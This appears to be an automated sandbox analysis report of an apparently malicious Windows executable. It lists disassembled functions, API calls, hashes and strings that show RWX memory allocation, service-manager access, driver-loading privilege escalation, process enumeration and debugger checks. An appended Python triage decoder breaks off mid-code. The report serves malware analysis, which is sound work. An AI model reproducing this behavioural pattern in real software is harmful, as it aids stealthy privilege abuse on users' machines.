                                    • Opcode ID: da14d96349d19b6851c801be004725f8cae35dac4bd273fa2ec22d1666f6cf57
                                    • Instruction ID: cf4d2cd10a7e5777cdc9f6ff615d9bbabe42395041f4383e72fa27b7b2e49c30
                                    • Opcode Fuzzy Hash: da14d96349d19b6851c801be004725f8cae35dac4bd273fa2ec22d1666f6cf57
                                    • Instruction Fuzzy Hash: 1B817C71A883018FD758DF68D84562FB6E6AB88744F000D6DF186D73D0DB74DE098B96

                                    Control-flow Graph

                                    APIs
                                    • FindFirstFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 00603AC4
                                    • FindNextFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 00603B1B
                                    • FindClose.KERNELBASE(?), ref: 00603B55
                                    Strings
                                    Memory Dump Source
                                     • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                     • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID: *LO$.
                                    • API String ID: 3541575487-2132576683
                                    • Opcode ID: 80a8e87440a71c8faddf5f166f25a53e367335088e3ee787c88985164d4632d1
                                    • Instruction ID: 8e19d6d1825a302b1f5f7b591363b7fbf3ebf5ae825d501c8c35216daee89620
                                    • Opcode Fuzzy Hash: 80a8e87440a71c8faddf5f166f25a53e367335088e3ee787c88985164d4632d1
                                    • Instruction Fuzzy Hash: F35103B17D422047CB6CABB49840ABB73AF9F94741F40892EF546C73C1EA75CE058752

                                    Control-flow Graph

                                    APIs
                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,0100754F,00000000), ref: 00608218
                                    Strings
                                    Memory Dump Source
                                     • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                     • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID: DR$Ou$m
                                    • API String ID: 823142352-902897619
                                    • Opcode ID: 3451f2d64c8d5ca0aa1f3872c7c9ed46e77a21262abb2292114655e30d729447
                                    • Instruction ID: 92bf6bd18c4d93a77e4ac20b0ba7b06ef9e64f08660f5b12f21b1c78cbaa83c9
                                    • Opcode Fuzzy Hash: 3451f2d64c8d5ca0aa1f3872c7c9ed46e77a21262abb2292114655e30d729447
                                    • Instruction Fuzzy Hash: 8B61AB32A887019FD758DF68C845A6FB6E6ABD4714F00891DF4D5972D0DBB8CA098B82

                                    Control-flow Graph

                                    APIs
                                    • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,006087E4,?,33A6B453,?,?), ref: 006052D3
                                    Memory Dump Source
                                     • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                     • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: ed563b744e4d8014fd8e7e7edc3d69609ece648e70fd0af299ce935feb4aab63
                                    • Instruction ID: d8adbde747c537bf41f70329ac6cd5b7af13e3166ec27173499bd5c4fee88958
                                    • Opcode Fuzzy Hash: ed563b744e4d8014fd8e7e7edc3d69609ece648e70fd0af299ce935feb4aab63
                                    • Instruction Fuzzy Hash: 1381E431BC07115BDB6CABB88C91B6B72DBAFC8740F444569F942DB3D0EE649E014B85

                                    Control-flow Graph

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000008,00000220), ref: 006031CB
                                    Memory Dump Source
                                     • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                     • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 1488313f0a26ee278cbc29c89f95d7d9b8eda96f28d87761a41d4e4dc368ce7e
                                    • Instruction ID: 2c4521386052b931224d0326918882fe73dffc1371b67ece1b80bb7f91f329a3
                                    • Opcode Fuzzy Hash: 1488313f0a26ee278cbc29c89f95d7d9b8eda96f28d87761a41d4e4dc368ce7e
                                    • Instruction Fuzzy Hash: 355191317843118BCB5CCF68949456FBBEAABD8341F10492EF456C7390DB30DA4A8792

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00606CD0: LoadLibraryW.KERNELBASE(00000000,?,33A6B453,00606F05,?,33A6B453,006068AC), ref: 00606D00
                                    • LoadLibraryW.KERNELBASE(00000000,?,33A6B453,006068AC), ref: 00606E87
                                    Strings
                                    Memory Dump Source
                                     • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                     • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: ;g+$;g+
                                    • API String ID: 1029625771-3974242271
                                    • Opcode ID: 9c8f5dec82a1de69cfd0f136abc5ec1174ac9b431096b051c7f5a4147feb308e
                                    • Instruction ID: 1dbc1cda1655697f5720a6c4a39669cc77dceda6b1ef3a88049829ea097245cf
                                    • Opcode Fuzzy Hash: 9c8f5dec82a1de69cfd0f136abc5ec1174ac9b431096b051c7f5a4147feb308e
                                    • Instruction Fuzzy Hash: 6B319E207C82108BEAACAEBCC85567F25879F84300F24953AF646CB3E1DDB4CC665796

                                    Control-flow Graph

                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00605C4B
                                    Strings
                                    Memory Dump Source
                                     • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                     • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                     • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: ?*S
                                    • API String ID: 621844428-1645505001
                                    • Opcode ID: 6bd16969eaa2fb291e12ce254cbfbd6484383597f892bd3c5237904a7d567573
                                    • Instruction ID: 64e516508abb63fca7168fefd43063a4ece9639079de8a2e521ffc91939d9dd3
                                    • Opcode Fuzzy Hash: 6bd16969eaa2fb291e12ce254cbfbd6484383597f892bd3c5237904a7d567573
                                    • Instruction Fuzzy Hash: 3CD0C9207C161047E69C6BF5D812B2B6297ABA0701F40552E750ACF3C6DFA18D215754

                                    Control-flow Graph

                                    APIs
                                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,005F0005), ref: 005F00E9
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,005F0005), ref: 005F0111
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocInfoNativeSystemVirtual
                                    • String ID:
                                    • API String ID: 2032221330-0
                                    • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                    • Instruction ID: 3a1af6495b0b4405637906f6bca21c906e5cae1f0e7f00036f37807f567e713f
                                    • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                    • Instruction Fuzzy Hash: 55D1C17560430A8FDB14CF19CC8477ABBE0FF84314F18592DEA858B282E778E845CB91

                                    Control-flow Graph
                                    • Rendered graph omitted. Function 41025b-4102ee: RtlAllocateHeap is called from block 410297-4102aa; subcalls to 412a13, 412864, 41257e, 412a79 and 411e2c.
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 00410274
                                      • Part of subcall function 00412A13: __NMSG_WRITE.LIBCMT ref: 00412A3A
                                      • Part of subcall function 00412A13: __NMSG_WRITE.LIBCMT ref: 00412A44
                                    • __NMSG_WRITE.LIBCMT ref: 0041027B
                                      • Part of subcall function 00412864: GetModuleFileNameW.KERNEL32(00000000,0041F722,00000104,00000001,00000000,?), ref: 00412900
                                      • Part of subcall function 00412864: __invoke_watson.LIBCMT ref: 00412929
                                      • Part of subcall function 00412864: _wcslen.LIBCMT ref: 0041292F
                                      • Part of subcall function 00412864: _wcslen.LIBCMT ref: 0041293C
                                      • Part of subcall function 0041257E: ___crtCorExitProcess.LIBCMT ref: 00412586
                                      • Part of subcall function 0041257E: ExitProcess.KERNEL32 ref: 0041258F
                                      • Part of subcall function 00411E2C: __getptd_noexit.LIBCMT ref: 00411E2C
                                    • RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00413CED,?,00000001,?,?,004147E0,00000018,0041BE58,0000000C,00414870), ref: 004102A0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ExitProcess_wcslen$AllocateFileHeapModuleName___crt__getptd_noexit__invoke_watson
                                    • String ID:
                                    • API String ID: 4285633346-0
                                    • Opcode ID: 85379f81ff0939ec83c584100c10549c30d19fa7ca46aaa6a850a0ef7457cf0a
                                    • Instruction ID: 7e8d332be424b32aeb7339ed39cdb599a77868d368d5d78e5393627917a903ca
                                    • Opcode Fuzzy Hash: 85379f81ff0939ec83c584100c10549c30d19fa7ca46aaa6a850a0ef7457cf0a
                                    • Instruction Fuzzy Hash: 7401B535244301AAE22177B6BC56BEB3748AF81378F20007BF505962E1DAFC8CD5826D

                                    Control-flow Graph
                                    • Rendered graph omitted. Function 609530-609854: OpenSCManagerW is called from block 609797-6097a6; subcalls to 603e40, 603da0, 607950, 603c80 and 603000.
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,33A6B453,?,?), ref: 006097A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ManagerOpen
                                    • String ID: y7@+
                                    • API String ID: 1889721586-1251112282
                                    • Opcode ID: da5ded9e30d80f916b77516d6b3697f9206bb9c5af19efb48474a8dc3e2f3bb4
                                    • Instruction ID: 2fde52583634a6b31a4d7a3068689a3c764712dcc1f90d7045bdc76ed7f2dbc9
                                    • Opcode Fuzzy Hash: da5ded9e30d80f916b77516d6b3697f9206bb9c5af19efb48474a8dc3e2f3bb4
                                    • Instruction Fuzzy Hash: EF71AD707D43018BD75D9F68AC9576B72A7AB84B00F10082EF145DB3D2EA70DD09CBA6

                                    Control-flow Graph
                                    • Rendered graph omitted. Function 604a80-604b8a: CreateProcessW is called from block 604ae7-604b05; subcalls to 603e40 and 603da0.
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 00604B01
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID: D
                                    • API String ID: 963392458-2746444292
                                    • Opcode ID: 5126ed7d76014ce7b1d8cf51a1c447f4a24b0b93feced25e50ebdec9480f8278
                                    • Instruction ID: 466a66d7c949186711452db90c214ed688910a46fb9693bd5b42324434b3aae5
                                    • Opcode Fuzzy Hash: 5126ed7d76014ce7b1d8cf51a1c447f4a24b0b93feced25e50ebdec9480f8278
                                    • Instruction Fuzzy Hash: B921AB70B903015BE768AB68CC01BAB739BAFC4B00F04492DB655CB3D0EEB5CD058395

                                    Control-flow Graph
                                    • Rendered graph omitted. Function 40ec40-40ecb2: VirtualAlloc is called from block 40ec71-40ec88; subcall to 40ebe0.
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0040EC7E
                                    Strings
                                    • tGeKa2B%k9F<3!6T*a>U%*s(fc>&tKC@3cQGhibVLni4I3u>F, xrefs: 0040EC93
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: tGeKa2B%k9F<3!6T*a>U%*s(fc>&tKC@3cQGhibVLni4I3u>F
                                    • API String ID: 4275171209-1198268820
                                    • Opcode ID: 3b538efd8d0877daca6c9ed735cc7399334d432909fa35e9c6d7cd521d04529b
                                    • Instruction ID: 01d0f4e730c09718d0011088008fc3b8b73f4a900f8981e618274441f709c89d
                                    • Opcode Fuzzy Hash: 3b538efd8d0877daca6c9ed735cc7399334d432909fa35e9c6d7cd521d04529b
                                    • Instruction Fuzzy Hash: 9EF046B5A846203BF22157258C0AFAF7E68CB84B50F544528FE046A2C0D7B89A0182DE

                                    Control-flow Graph
                                    • Rendered graph omitted. Function 20e1d10-20e1e74: VirtualProtect is called from block 20e1e3c-20e1e59; subcalls to 20e1820 and 20e1b20.
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_20e1000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e68c1af996a341e62c7dc9fad1afa9741ab55899a349054725438aa47170f758
                                    • Instruction ID: 2e6fd301ebf17f7534a09d365defff99b1cf71b230e4b9bad105493300293e71
                                    • Opcode Fuzzy Hash: e68c1af996a341e62c7dc9fad1afa9741ab55899a349054725438aa47170f758
                                    • Instruction Fuzzy Hash: 7B41C574A04209AFDB45DF44C494BAEB7B2FB88314F24C199E81A5F355C775EE82DB80
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID:
                                    • API String ID: 4033686569-0
                                    • Opcode ID: af312b1ec1dae1fe8ffa610f702541a8a10efe778052e2765cedc299e6073d92
                                    • Instruction ID: 24e887ca475f3adf23278b0115b53cf71ed78e04cb25c141ed464b0cf058d41c
                                    • Opcode Fuzzy Hash: af312b1ec1dae1fe8ffa610f702541a8a10efe778052e2765cedc299e6073d92
                                    • Instruction Fuzzy Hash: E3119170B902205BD7ACABB49D11A6B36EF9FC8701B40492EF615CB3C1EE75DE018795
                                    APIs
                                    • LoadLibraryW.KERNELBASE(00000000,?,33A6B453,00606F05,?,33A6B453,006068AC), ref: 00606D00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 6897006f12fd4eccd63b986342aa29c356f4b010db34f9a2ea8196e787eea503
                                    • Instruction ID: 8316a1caecb3a3332ecbfcf7cbee43f1fc0342861388325ed1bcf33923d03931
                                    • Opcode Fuzzy Hash: 6897006f12fd4eccd63b986342aa29c356f4b010db34f9a2ea8196e787eea503
                                    • Instruction Fuzzy Hash: F5016D307802604BD79CBBB99850A2B36EBAFC8600700992EF509CB3D1EE34DD028B94
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_20e1000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 50e2670c90142c94f8c7e7d673f8e184b482f4407b322eada844b233527f0048
                                    • Instruction ID: 8a5c0b6d5746d6e29bfe7f02e1a8e7b0312f5926780e58f598e1e2b4d1fd5307
                                    • Opcode Fuzzy Hash: 50e2670c90142c94f8c7e7d673f8e184b482f4407b322eada844b233527f0048
                                    • Instruction Fuzzy Hash: EFD05EB4D40308FFEB00EFA4D90AB9DBBB4EB04701F108165E9056B240E6B02B44DF52
                                    APIs
                                    • VirtualFree.KERNELBASE(?,?,?), ref: 020E182F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_20e1000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: 6a883493564ada025baec0f8d3f97c669d9f11cd6d74832e186b9eca16b2912a
                                    • Instruction ID: 3e850c5857471cf67c5a8cfcc649f087763ed4edebc4c8d558f62fc0a5046611
                                    • Opcode Fuzzy Hash: 6a883493564ada025baec0f8d3f97c669d9f11cd6d74832e186b9eca16b2912a
                                    • Instruction Fuzzy Hash: C5C04C7A55430CEB8B04DF98E894DAB3BADBB8CA10B048948BA1D87200C634F9508BA4
                                    APIs
                                    • GetUserNameW.ADVAPI32 ref: 0040F53E
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F548
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F58B
                                    • CloseHandle.KERNEL32(00000000), ref: 0040F5A2
                                      • Part of subcall function 0040E170: GetLastError.KERNEL32 ref: 0040E18D
                                      • Part of subcall function 0040E170: FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: CloseCreateErrorFirstFormatHandleLastMessageNameProcess32SnapshotToolhelp32User
                                    • String ID: $%d K$CreateToolhelp32Snapshot (of processes)$Process32First
                                    • API String ID: 3266005361-2221559773
                                    • Opcode ID: 5abc778807c62ae2baa570d19bc32579730fa3d8dd42b44df11fc9701d9f20bb
                                    • Instruction ID: 63f366d3fdf1a23c1a20b758398628cdb4654b08413e4f9ed28baa702ff12125
                                    • Opcode Fuzzy Hash: 5abc778807c62ae2baa570d19bc32579730fa3d8dd42b44df11fc9701d9f20bb
                                    • Instruction Fuzzy Hash: 6251B671504300ABD324AB64DC52FEB73E8EF84758F44493EF589922C1EB7C9948879B
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 0040E22E
                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040E23B
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 0040E24D
                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0040E28B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeLoadDriverPrivilege
                                    • API String ID: 2349140579-497486668
                                    • Opcode ID: cffa3139d4f1966d0e1b8d4b561fce07a712f7e5228b86654aafc6df663748c5
                                    • Instruction ID: 6ea790c7a31b1ba1ad77907437152988263291b3601ce40a83fb03ebe5ecb5a6
                                    • Opcode Fuzzy Hash: cffa3139d4f1966d0e1b8d4b561fce07a712f7e5228b86654aafc6df663748c5
                                    • Instruction Fuzzy Hash: D301DAB4548301AFD704DF50C999F9BBBE4AB8CB08F40891DF58A862A0E774E948CB56
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0041212A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041213F
                                    • UnhandledExceptionFilter.KERNEL32(0041989C), ref: 0041214A
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00412166
                                    • TerminateProcess.KERNEL32(00000000), ref: 0041216D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: 6f2c9a2ca4667ff0c482e712aad0c8141d9414460f1110707eeb279986343969
                                    • Instruction ID: b5dc470c48336d2cad9fc5f7ad5caf64c585ac90b15cfe1187e4ee1c5b5d9eed
                                    • Opcode Fuzzy Hash: 6f2c9a2ca4667ff0c482e712aad0c8141d9414460f1110707eeb279986343969
                                    • Instruction Fuzzy Hash: 8C21DBB4911204EFD700DF69EC896C63BB4BB6C315F50803AE90A87372E7B4598A8F1D
                                    APIs
                                    • GetLastError.KERNEL32 ref: 0040E18D
                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    Strings
                                    • WARNING: %s failed with error %d (%s), xrefs: 0040E1F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID: WARNING: %s failed with error %d (%s)
                                    • API String ID: 3479602957-1953342023
                                    • Opcode ID: b598ef8f7daf12207a35918aebcbaa5f324a21470e7471301164a79c2446e67a
                                    • Instruction ID: 71bfe3ff1a5da696a3addf6ac62f14f1fc4c04e671a446e7e169288bb51f98c2
                                    • Opcode Fuzzy Hash: b598ef8f7daf12207a35918aebcbaa5f324a21470e7471301164a79c2446e67a
                                    • Instruction Fuzzy Hash: 1201267160430066E7249B12DC86BFB3BA9EF8A710F504C3AF555CA1D0E6749890C29E
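                                    The API reference lines in the function entries above carry their arguments as raw hex (VirtualAlloc with 00003000/00000040, OpenProcessToken with 00000028, OpenSCManagerW with 000F003F, FormatMessageW with 00001200). The following is an added example, not part of the Joe Sandbox report or of the analysed sample: a small Python decoder that parses those lines, expands the Win32 flag constants, and flags the calls a triager would want to look at first. The line format it accepts and the sample lines (copied from this report's entries) are the assumptions of the example; the flag values are the documented Win32 SDK constants.

```python
"""Decode Joe Sandbox 'API' reference lines into named Win32 flags and triage them.

Added example; not part of the sandbox report. Assumes the line shape
'Api.MODULE(arg,arg,...), ref: ADDR' seen in the report entries above.
Lines without an argument list (e.g. 'GetUserNameW.ADVAPI32 ref: ...') are skipped.
"""
import re
from dataclasses import dataclass, field

# Constructed test input: API lines copied from the report entries above.
SAMPLE_LINES = [
    "• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0040EC7E",
    "• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,005F0005), ref: 005F0111",
    "• OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,33A6B453,?,?), ref: 006097A0",
    "• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040E23B",
    "• LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 0040E24D",
    "• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F548",
    "• FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE",
]

LINE_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Win32 SDK constants for the argument positions decoded below.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
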